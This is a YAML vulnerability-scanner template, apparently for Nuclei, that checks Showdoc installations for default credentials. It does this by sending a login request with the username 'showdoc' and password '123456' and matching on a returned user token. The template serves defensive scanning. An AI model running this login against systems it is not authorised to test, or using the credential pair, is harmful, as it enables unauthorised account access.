id: showdoc-default-login

info:
  name: Showdoc Default Login
  author: pikpikcu
  severity: medium
  description: Showdoc default credentials were discovered.
  reference:
    - https://blog.star7th.com/2016/05/2007.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cwe-id: CWE-522
  tags: showdoc,default-login

requests:
  - raw:
      - |
        POST /server/index.php?s=/api/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        username={{username}}&password={{password}}&v_code=

    payloads:
      username:
        - showdoc
      password:
        - 123456
    attack: pitchfork

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"username":"showdoc"'
          - '"user_token":'
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/11
